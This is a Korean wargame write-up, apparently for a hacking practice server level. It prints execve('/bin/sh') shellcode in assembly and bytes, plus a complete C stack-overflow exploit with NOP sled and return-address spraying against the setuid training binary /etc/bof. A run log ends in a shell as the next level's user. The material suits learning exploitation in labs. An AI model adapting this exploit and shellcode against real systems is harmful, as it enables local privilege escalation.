Bounds checking을 하지 않아 발생하는 보안 문제이다.
Hint – /etc/bof
———
이번엔 삼일정도 걸렸네요;; 재밌었지만 힘들었음.
설명없이 gogo~
[root@protos tmp]# cat shellcodeasm.c
/*
 * Inline-assembly form of the routine whose encoded bytes appear as
 * `shellcode[]` in testsc.c and exploit.c. The assembler comment on each
 * line (after `#`) states that instruction's role; the `jmp`/`call` pair
 * at the top and bottom exists so the routine can find its own trailing
 * ".string" without knowing where it was loaded. Linux/x86-32 only
 * (`int $0x80` system-call convention).
 * NOTE(review): `void main()` is non-standard; main returns int. This
 * program exists only to assemble the routine and read its bytes back.
 */
void main()
{
    __asm__(“jmp pushing # jumps to call statement\n\t”
    “getting:”
    “popl %esi # get the addr of /bin/sh string\n\t”
    “movl %esi, 0x8(%esi) # write addr of /bin/sh after /bin/sh(NULL)\n\t”
    “xorl %eax, %eax # make zero valued register\n\t”
    “movb %al, 0x7(%esi) # make /bin/sh string null terminated\n\t”
    “movl %eax, 0xc(%esi) # long-word size zeros\n\t”
    “movb $0xb, %al # execve system call number\n\t”
    “movl %esi, %ebx # address of /bin/sh(NULL)\n\t”
    “leal 0x8(%esi), %ecx # get the addr of addr of /bin/sh(NULL)\n\t”
    “leal 0xc(%esi), %edx # get the addr of long-word size zeros\n\t”
    “int $0x80 # into the kernel mode\n\t”
    “xorl %ebx, %ebx # return code of exit\n\t”
    “movl %ebx, %eax # exit() system call number is 1\n\t”
    “inc %eax # exit() system call number is 1\n\t”
    “int $0x80 # into the kernel mode\n\t”
    “pushing:”
    “call getting # to push the addr of /bin/sh string\n\t”
    “.string “/bin/sh”\n\t”
    );
}
[root@protos tmp]# cat testsc.c
/*
 * Byte encoding of the inline assembly in shellcodeasm.c, followed by the
 * "/bin/sh" string that routine references. It is kept as a C string, so
 * its length can be taken with strlen(); that only works because no byte
 * of the encoding is 0x00 (a NUL would terminate the string early).
 */
char shellcode[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46"
"\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
"\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
/*
 * Local check that shellcode[] runs: the store through `&ret + 2` is
 * presumably meant to replace this frame's saved return address, so that
 * returning from main() continues in shellcode[].
 * NOTE(review): `&ret + 2` hard-codes a frame layout (saved EIP exactly
 * two words above `ret`) that depends on the compiler and its options;
 * writing outside `ret` is undefined behavior in C, and the jump only
 * succeeds where the data section holding shellcode[] is executable, which
 * modern toolchains and kernels do not allow by default.
 * `void main()` is non-standard; main returns int.
 */
void main()
{
    int *ret;
    ret = &ret + 2;
    (*ret) = (int) shellcode;
}
[level9@drill h4q0]$ cat exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/* x86 one-byte no-op opcode; used by main() to pad the first half of the buffer. */
#define NOP 0x90
/* Value subtracted from the sampled stack pointer when argv[2] is not given. */
#define DEFAULT_OFFSET 0
/*
 * Same byte encoding as in testsc.c (the routine from shellcodeasm.c plus
 * its trailing "/bin/sh"). main() measures it with strlen(), which is only
 * correct because the encoding contains no 0x00 byte.
 */
char shellcode[]=”\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46″
“\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e”
“\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8”
“\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh”;
/*
 * Returns this process's current stack pointer. The asm copies %esp into
 * %eax and the function then falls off its end, relying on %eax being the
 * return-value register of the 32-bit x86 ABI.
 * NOTE(review): there is no `return` statement, so as C this is undefined
 * behavior (value of a non-void function used without a return); it also
 * depends on the compiler emitting nothing that touches %eax between the
 * asm and the epilogue, and does not apply on x86-64 (different registers).
 */
unsigned long sp(void)
{
    __asm__(“movl %esp, %eax”);
}
/*
 * Builds one argument string for /etc/bof and exec's it.
 *   argv[1]  total buffer size in bytes
 *   argv[2]  optional offset subtracted from the sampled stack pointer to
 *            form the address written into the buffer (DEFAULT_OFFSET if absent)
 * Buffer layout, in the order the code below produces it: the whole buffer
 * is filled with the 4-byte address, the first half is overwritten with
 * NOPs, the shellcode is copied in starting half its length before the NOP
 * run ends, and the last byte is set to NUL so execl() receives a string.
 * Returns 0 only if execl() fails; a successful exec does not return.
 */
int main(int argc, char *argv[])
{
    int i, offset, buffer_size, nop_sled_size;
    long esp, ret, *addr_ptr;
    char *buffer, *ptr;
    if (argc != 2 && argc != 3)
    {
        printf(“usage: exploit [buffer size] [offset]\n”);
        exit(0);
    }
    /* atoi() reports no errors: a non-numeric, zero or negative size is
     * accepted here and only fails later (malloc/indexing). */
    buffer_size = atoi(argv[1]);
    printf(“BUFFER_SIZE: %d\n”, buffer_size);
    if (argc == 3) offset= atoi(argv[2]);
    else offset = DEFAULT_OFFSET;
    printf(“OFFSET: %d\n”, offset);
    esp = sp(); // Get the current ESP
    /* %x with a long argument is a mismatched conversion (should be %lx). */
    printf(“ESP: 0x%x\n”, esp);
    ret = esp – offset; // Location of the buffer of the victim
    /* malloc() result is not checked; a NULL would be dereferenced below. */
    buffer = (char *) malloc(buffer_size);
    // Return Addresses
    printf(“RET: 0x%x\n”, ret);
    addr_ptr = (long *) buffer;
    /* Writes one `long` every 4 bytes. Assumes sizeof(long) == 4 (32-bit
     * target); if buffer_size is not a multiple of 4 the last store runs
     * past the end of the allocation. */
    for (i = 0; i < buffer_size; i+=4)
        *(addr_ptr++) = ret;
    // NOP sled
    nop_sled_size = buffer_size / 2;
    printf(“NOP SLED: %d\n”, nop_sled_size);
    if (nop_sled_size > 0)
    {
        for (i = 0; i < nop_sled_size; i++)
            buffer[i] = NOP;
        /* Shellcode starts half its own length before the NOP run ends. */
        ptr = buffer + nop_sled_size – strlen(shellcode) / 2;
    }
    else
    {
        ptr = buffer;
    }
    // SHELLCODE
    /* %d with a size_t argument is a mismatched conversion (should be %zu). */
    printf (“SHELL CODE SIZE: %d\n”, strlen(shellcode));
    /* No check that the shellcode fits after `ptr`: with a small
     * buffer_size this copy writes beyond the end of buffer. */
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buffer[buffer_size-1] = ‘\0’;
    // Run the bof
    execl(“/etc/bof”, “bof”, buffer, NULL);
    /* Reached only when execl() fails; its return value and errno are not inspected. */
    free(buffer);
    return 0;
}
[level9@drill h4q0]$ ./exploit 100 88
BUFFER_SIZE: 100
OFFSET: 88
ESP: 0xbffffaf4
RET: 0xbffffa9c
NOP SLED: 50
SHELL CODE SIZE: 45
hello~ 릱릱릱릱릱릱릱릱릱릱릱릱릱릱??핂F덯
?
됹뜊V
?1???汪/bin/sh?퓶?퓶?퓶?퓶?퓶?퓶?
bash$ whoami
level10